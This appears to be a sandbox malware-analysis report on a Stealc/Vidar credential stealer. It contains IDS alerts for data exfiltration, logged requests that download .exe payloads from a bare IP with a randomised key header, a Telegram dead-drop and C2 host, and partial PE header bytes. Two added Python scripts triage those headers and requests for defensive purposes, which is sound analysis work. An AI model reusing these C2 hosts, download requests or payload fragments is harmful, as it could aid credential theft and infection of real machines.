Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: chrome.exe | Memory has grown: Private usage: 1MB later: 41MB

                Networking

Source: Network traffic | Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.16:49715 -> 116.202.5.153:443
Source: Network traffic | Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 : 192.168.2.16:49713 -> 116.202.5.153:443
Source: Network traffic | Suricata IDS: 2859378 - Severity 1 - ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 : 192.168.2.16:49709 -> 116.202.5.153:443
Source: Network traffic | Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.16:49731 -> 116.202.5.153:443
Source: Network traffic | Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 116.202.5.153:443 -> 192.168.2.16:49713
Source: Network traffic | Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.16:49734 -> 116.202.5.153:443
Source: Network traffic | Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.16:49734 -> 116.202.5.153:443
Source: Network traffic | Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 116.202.5.153:443 -> 192.168.2.16:49712
Source: Network traffic | Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.16:49714 -> 116.202.5.153:443
Source: Network traffic | Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.16:49736 -> 116.202.5.153:443
Source: Network traffic | Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.16:49736 -> 116.202.5.153:443
Source: Network traffic | Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.16:49735 -> 116.202.5.153:443
Source: Network traffic | Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.16:49735 -> 116.202.5.153:443
Source: Network traffic | Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.16:49737 -> 116.202.5.153:443
Source: Network traffic | Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.16:49781 -> 116.202.5.153:443
Source: Network traffic | Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.16:49781 -> 116.202.5.153:443
Source: Network traffic | Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.16:49775 -> 116.202.5.153:443
Source: Network traffic | Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.16:49822 -> 116.202.5.153:443
Source: Network traffic | Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.16:49822 -> 116.202.5.153:443
Source: Network traffic | Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.16:49794 -> 116.202.5.153:443
Source: Network traffic | Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.16:49794 -> 116.202.5.153:443
Source: Network traffic | Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.16:49850 -> 116.202.5.153:443
Source: Network traffic | Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.16:49850 -> 116.202.5.153:443
Source: Network traffic | Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.16:49834 -> 116.202.5.153:443
Source: Network traffic | Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.16:49834 -> 116.202.5.153:443
Source: Network traffic | Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.16:49836 -> 116.202.5.153:443
Source: Network traffic | Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.16:49836 -> 116.202.5.153:443
Source: Network traffic | Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.16:49887 -> 116.202.5.153:443
Source: Network traffic | Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.16:49931 -> 116.202.5.153:443
Source: Network traffic | Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.16:49951 -> 116.202.5.153:443
Source: Network traffic | Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.16:49965 -> 116.202.5.153:443
Source: Network traffic | Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.16:49976 -> 116.202.5.153:443
Source: Network traffic | Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.16:49960 -> 116.202.5.153:443
Source: Malware configuration extractor | URLs: https://steamcommunity.com/profiles/76561199820567237
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File created: lfcjeuk6pz.exe.15.dr
Source: Yara match | File source: 5.2.SoftWareGX.exe.3cd94d0.0.raw.unpack, type: UNPACKEDPE
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 30 Jan 2025 17:10:51 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Thu, 30 Jan 2025 14:34:25 GMTETag: "8a00-62ced529ccee7"Accept-Ranges: bytesContent-Length: 35328Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 cd a2 39 f4 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 80 00 00 00 08 00 00 00 00 00 00 1e 9f 00 00 00 20 00 00 00 a0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 00 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 cc 9e 00 00 4f 00 00 00 00 a0 00 00 d0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 0c 00 00 00 b0 9e 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 24 7f 00 00 00 20 00 00 00 80 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d0 05 00 00 00 a0 00 00 00 06 00 00 00 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 00 00 00 02 00 00 00 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9f 00 00 00 00 00 00 48 00 00 00 02 00 05 00 a4 21 00 00 0c 7d 00 00 03 00 02 00 05 00 00 06 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 05 00 5c 00 00 00 01 00 00 11 02 28 0f 00 00 0a 0a 28 10 00 00 0a 03 6f 11 00 00 0a 0b 06 8e 69 8d 16 00 00 01 0c 16 0d 2b 2a 08 09 06 09 91 09 1f 3b 5a 20 00 01 00 00 5d d2 61 d2 9c 08 09 8f 16 00 00 01 25 47 07 09 07 8e 69 5d 91 61 d2 52 09 17 58 0d 09 06 8e 69 32 d0 28 10 00 00 0a 08 6f 12 00 00 0a 2a 1e 02 28 13 00 00 0a 2a 13 30 07 00 9e 00 00 00 02 00 00 11 72 01 00 00 70 0a 73 14 00 00 0a 73 15 00 00 0a 0b 07 6f 16 00 00 0a 72 26 73 00 70 7e 01 00 00 04 28 01 00 00 06 6f 17 00 00 0a 26 07 6f 16 00 00 0a 72 48 73 00 70 7e 01 00 00 04 28 01 00 00 06 6f 17 00 00 0a 26 07 17 6f 18 00 00 0a 07 17 8d 19 00 00 01 25 16 06 7e 01 00 00 04 28 01 00 00 06 a2 6f 19 00 00 0a 6f 1a 00 00 0a 72 72 73 00 70 7e 01 00 00 04 28 01 00 00 06 6f 1b 00 00 0a 72 8c 73 00 70 7e 01 00 00 04 28 01 00 00 06 6f 1c 00 00 0a 14 14 6f 1d 00 00 0a 26 2a 1e 02 28 13 00 00 0a 2a 1a 28 03 00 00 06 2a 1e 02 28 13 00 00 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 30 Jan 2025 17:10:51 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Thu, 30 Jan 2025 14:32:13 GMTETag: "44200-62ced4abdebc0"Accept-Ranges: bytesContent-Length: 279040Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 80 bc 97 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 d4 02 00 00 6a 01 00 00 00 00 00 f0 41 02 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 04 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 8a 03 00 57 00 00 00 57 8a 03 00 54 01 00 00 00 30 04 00 a8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 04 00 d0 61 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 86 03 00 5c 00 00 00 00 00 00 00 00 00 00 00 d4 8e 03 00 28 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 7c d2 02 00 00 10 00 00 00 d4 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 e0 2e 72 64 61 74 61 00 00 b4 af 00 00 00 f0 02 00 00 b0 00 00 00 d8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 a0 73 00 00 00 a0 03 00 00 54 00 00 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 20 04 00 00 02 00 00 00 dc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 a8 01 00 00 00 30 04 00 00 02 00 00 00 de 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 
00 00 40 2e 72 65 6c 6f 63 00 00 d0 61 00 00 00 40 04 00 00 62 00 00 00 e0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
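The two 200 OK responses above carry the first bytes of each executable served from 147.45.44.42 (Content-Length 35328 and 279040, both application/x-msdos-program). The following script is an added example and not part of the Joe Sandbox report: it parses the captured header bytes the way a triage analyst would, pulling out machine type, section count, link timestamp, linker version and the DllCharacteristics mitigation flags. The two byte strings are transcribed from the report's "Data Raw" fields and cut after DllCharacteristics; the observation time is taken from the responses' HTTP Date header. The toolchain labels (linker 48.0 for Roslyn, 14.x for MSVC) are heuristics, and the mapping of response to request path is not asserted because the report does not state it.

```python
"""Parse the PE headers captured in the two 200 OK responses and pull out the
fields a triage analyst checks first: machine, section count, link timestamp,
linker version and exploit-mitigation flags."""
import struct
from datetime import datetime, timezone

# Constructed input: the first 224 and 216 bytes of the two response bodies,
# transcribed from the report's "Data Raw" fields. That reaches
# IMAGE_OPTIONAL_HEADER.DllCharacteristics, which is as far as this parser reads.
RESP_35328 = bytes.fromhex(
    "4d5a90000300000004000000ffff0000" "b8000000000000004000000000000000"
    "00000000000000000000000000000000" "00000000000000000000000080000000"
    "0e1fba0e00b409cd21b8014ccd215468" "69732070726f6772616d2063616e6e6f"
    "742062652072756e20696e20444f5320" "6d6f64652e0d0d0a2400000000000000"
    "504500004c010300cda239f400000000" "00000000e00022000b01300000800000"
    "00080000000000001e9f000000200000" "00a00000000040000020000000020000"
    "04000000000000000600000000000000" "00e00000000200000000000002006085"
)
RESP_279040 = bytes.fromhex(
    "4d5a7800010000000400000000000000" "00000000000000004000000000000000"
    "00000000000000000000000000000000" "00000000000000000000000078000000"
    "0e1fba0e00b409cd21b8014ccd215468" "69732070726f6772616d2063616e6e6f"
    "742062652072756e20696e20444f5320" "6d6f64652e240000504500004c010600"
    "80bc97670000000000000000e0000201" "0b010e0000d40200006a010000000000"
    "f0410200001000000000000000004000" "00100000000200000600000000000000"
    "060000000000000000b0040000040000" "0000000002000080"
)
# When the responses were served, from their HTTP Date header.
OBSERVED = datetime(2025, 1, 30, 17, 10, 51, tzinfo=timezone.utc)

MACHINES = {0x014C: "i386", 0x8664: "x86-64", 0x01C4: "ARM", 0xAA64: "ARM64"}
DLL_CHARACTERISTICS = {
    0x0020: "HIGH_ENTROPY_VA", 0x0040: "DYNAMIC_BASE", 0x0100: "NX_COMPAT",
    0x0400: "NO_SEH", 0x4000: "GUARD_CF", 0x8000: "TERMINAL_SERVER_AWARE",
}


def describe_timestamp(ts: int, observed: datetime = OBSERVED):
    """Return (ISO link time or None, verdict). A stamp later than the moment the
    file was downloaded cannot be a real link time: Roslyn deterministic builds
    store a hash there and some packers write junk."""
    if ts == 0:
        return None, "zeroed"
    if ts > int(observed.timestamp()):
        return None, "future: not a wall-clock link time (deterministic-build hash or tampered)"
    built = datetime.fromtimestamp(ts, timezone.utc)
    return built.isoformat(), f"linked {(observed - built).days} days before the download"


def parse_pe_header(data: bytes) -> dict:
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature at e_lfanew")
    coff = e_lfanew + 4
    machine, nsections, ts, _, _, _opt_size, _chars = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic, linker_major, linker_minor = struct.unpack_from("<HBB", data, opt)
    if magic not in (0x10B, 0x20B):
        raise ValueError(f"unknown optional header magic {magic:#x}")
    (entry,) = struct.unpack_from("<I", data, opt + 16)
    # PE32 keeps a 4-byte ImageBase at +28; PE32+ drops BaseOfData and has an 8-byte ImageBase at +24.
    (image_base,) = (struct.unpack_from("<I", data, opt + 28) if magic == 0x10B
                     else struct.unpack_from("<Q", data, opt + 24))
    subsystem, dll_chars = struct.unpack_from("<HH", data, opt + 68)
    built, note = describe_timestamp(ts)
    flags = [name for bit, name in DLL_CHARACTERISTICS.items() if dll_chars & bit]
    if (linker_major, linker_minor) == (48, 0):
        toolchain = "Roslyn (managed .NET assembly)"          # heuristic: Roslyn stamps linker 48.0
    elif linker_major == 14:
        toolchain = "MSVC 14.x (Visual Studio 2015 or later)"  # heuristic
    else:
        toolchain = f"unknown (linker {linker_major}.{linker_minor})"
    return {
        "machine": MACHINES.get(machine, f"{machine:#06x}"),
        "format": "PE32" if magic == 0x10B else "PE32+",
        "sections": nsections,
        "timestamp": ts,
        "built_utc": built,
        "timestamp_note": note,
        "linker": f"{linker_major}.{linker_minor}",
        "toolchain": toolchain,
        "entry_point": entry,
        "image_base": image_base,
        "subsystem": {2: "GUI", 3: "console"}.get(subsystem, str(subsystem)),
        "dll_characteristics": flags,
        "missing_mitigations": [m for m in ("DYNAMIC_BASE", "NX_COMPAT") if m not in flags],
    }


if __name__ == "__main__":
    for label, body in (("Content-Length 35328", RESP_35328), ("Content-Length 279040", RESP_279040)):
        print(label)
        for key, value in parse_pe_header(body).items():
            print(f"  {key}: {value:#x}" if isinstance(value, int) else f"  {key}: {value}")
```

Run as-is the script reports the 35328-byte response as a three-section PE32 with linker 48.0 and a far-future timestamp (the deterministic-build hash Roslyn writes, which is what the "suspicious time stamp" signature in the summary picks up), and the 279040-byte response as a six-section MSVC-built PE32 linked three days before the download with neither DYNAMIC_BASE nor NX_COMPAT set.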
                Source: global traffic; HTTP traffic detected:
                    GET /m08mbk HTTP/1.1
                    Host: t.me
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                Source: global traffic; HTTP traffic detected:
                    GET /boom/tvhaqk.exe HTTP/1.1
                    fDsdWpC1Kr1ADlJEQf5TUrSTrY2h2u41sMkrsfhwLwlxIQCB6y: VtAoUiLGBN8JuIRrrC1tFjmxppXCaGpKltJpaX9l7d4gYg3aW4
                    Host: 147.45.44.42
                    Connection: Keep-Alive
                Source: global traffic; HTTP traffic detected:
                    GET /boom/uykb.exe HTTP/1.1
                    fDsdWpC1Kr1ADlJEQf5TUrSTrY2h2u41sMkrsfhwLwlxIQCB6y: VtAoUiLGBN8JuIRrrC1tFjmxppXCaGpKltJpaX9l7d4gYg3aW4
                    Host: 147.45.44.42
                Source: Joe Sandbox View; IP Address: 68.67.160.26
                Source: Joe Sandbox View; IP Address: 108.139.47.50
                Source: Joe Sandbox View; JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                Source: Network traffic; Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.16:49989 -> 162.125.66.18:443
                Source: unknown; TCP traffic detected without corresponding DNS query: 192.229.211.108
                Source: unknown; TCP traffic detected without corresponding DNS query: 2.23.77.188
                Source: unknown; TCP traffic detected without corresponding DNS query: 20.189.173.10 (4 occurrences)
                Source: unknown; TCP traffic detected without corresponding DNS query: 147.45.44.42 (44 occurrences)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Code function 15_2_00407A70: InternetReadFile
                Source: global traffic; HTTP traffic detected:
                    GET / HTTP/1.1
                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0
                    Host: huloar.live
                    Connection: Keep-Alive
                    Cache-Control: no-cache
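The request lines in this section fall into two groups: requests the sample's own code issued (the t.me lookup, the two .exe fetches from a bare IP with a randomised header name and no User-Agent, and the GET / to huloar.live with a macOS Firefox User-Agent sent from a Windows guest) and requests the guest's browsers issued on their own (the www.google.com, ntp.msn.com and assets.msn.com lines that follow, all carrying Sec-Fetch-* fetch-metadata headers). The script below is an added example, not part of the Joe Sandbox report: it re-types four of those requests as proper HTTP messages (the Edge new-tab request is trimmed to the headers the check needs) and tags each one with the indicators above. The tag names, the 20-character threshold for a "random" header name, the treatment of Sec-Fetch-* as proof of browser origin and the dead-drop host list are this example's own heuristics.

```python
"""Tag sandbox HTTP requests with the indicators that separate the sample's own
traffic from browser background noise."""
import ipaddress
import re

SANDBOX_OS = "Windows"            # the guest OS; a User-Agent claiming another OS is forged
DEAD_DROP_HOSTS = {"t.me"}        # hosts used only to fetch a C2 address (extend as needed)

# Constructed input: four requests re-typed from the report's "HTTP traffic detected"
# lines with CRLF line endings; the Edge new-tab request keeps only the headers used here.
REQUESTS = [
    "GET /m08mbk HTTP/1.1\r\nHost: t.me\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n",
    "GET /boom/tvhaqk.exe HTTP/1.1\r\n"
    "fDsdWpC1Kr1ADlJEQf5TUrSTrY2h2u41sMkrsfhwLwlxIQCB6y: VtAoUiLGBN8JuIRrrC1tFjmxppXCaGpKltJpaX9l7d4gYg3aW4\r\n"
    "Host: 147.45.44.42\r\nConnection: Keep-Alive\r\n",
    "GET / HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0\r\n"
    "Host: huloar.live\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n",
    "GET /edge/ntp?locale=en-GB&title=New%20tab HTTP/1.1\r\nHost: ntp.msn.com\r\n"
    "Sec-Fetch-Site: none\r\nSec-Fetch-Dest: document\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) "
    "Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47\r\n",
]


def parse_request(raw: str) -> dict:
    """Split a raw request into method, target and an ordered header list."""
    lines = raw.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = []
    for line in lines[1:]:
        if line:
            name, _, value = line.partition(":")
            headers.append((name.strip(), value.strip()))
    return {"method": method, "target": target, "headers": headers}


def is_ip_literal(host: str) -> bool:
    try:
        ipaddress.ip_address(host.rsplit(":", 1)[0])
        return True
    except ValueError:
        return False


def triage(raw: str) -> list:
    req = parse_request(raw)
    by_name = {n.lower(): v for n, v in req["headers"]}
    host, ua = by_name.get("host", ""), by_name.get("user-agent", "")
    tags = []
    # Fetch-metadata headers are added by a browser engine; WinINet/WinHTTP code never sends them.
    if any(n.lower().startswith("sec-fetch-") for n, _ in req["headers"]):
        return ["browser-origin"]
    if is_ip_literal(host):
        tags.append("ip-literal-host")
    if req["target"].lower().endswith(".exe"):
        tags.append("exe-download")
    # A long run of bare alphanumerics is not a real header name; loaders use it as a key.
    if any(re.fullmatch(r"[A-Za-z0-9]{20,}", n) for n, _ in req["headers"]):
        tags.append("random-header-name")
    if host in DEAD_DROP_HOSTS:
        tags.append("dead-drop-resolver")
    if not ua:
        tags.append("no-user-agent")
    elif SANDBOX_OS not in ua:
        tags.append("ua-os-mismatch")
    return tags


def triage_session(raws: list) -> list:
    """Per-request tags, plus a session rule: the first GET / to a named host after a
    dead-drop lookup is the likely C2 the dead drop resolved to."""
    results = [triage(r) for r in raws]
    armed = False
    for raw, tags in zip(raws, results):
        if "dead-drop-resolver" in tags:
            armed = True
        elif armed and "browser-origin" not in tags and "ip-literal-host" not in tags:
            if parse_request(raw)["target"] == "/":
                tags.append("possible-c2-from-dead-drop")
                armed = False
    return results


if __name__ == "__main__":
    for raw, tags in zip(REQUESTS, triage_session(REQUESTS)):
        print(raw.split("\r\n")[0], "->", ", ".join(tags) or "no indicators")
```

The session rule is deliberately narrow: it only fires for a GET / to a hostname that appears after the dead-drop lookup and is not a browser request, which is exactly the t.me then huloar.live sequence recorded above.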
                Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlaHLAQj2mM0BCIWgzQEI3L3NAQiRys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlaHLAQj2mM0BCIWgzQEI3L3NAQiRys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.l2ZUC8FxqV8.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo9xAAkaXO7Lqf7-9uTpZLtrkpWaXQ/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlaHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
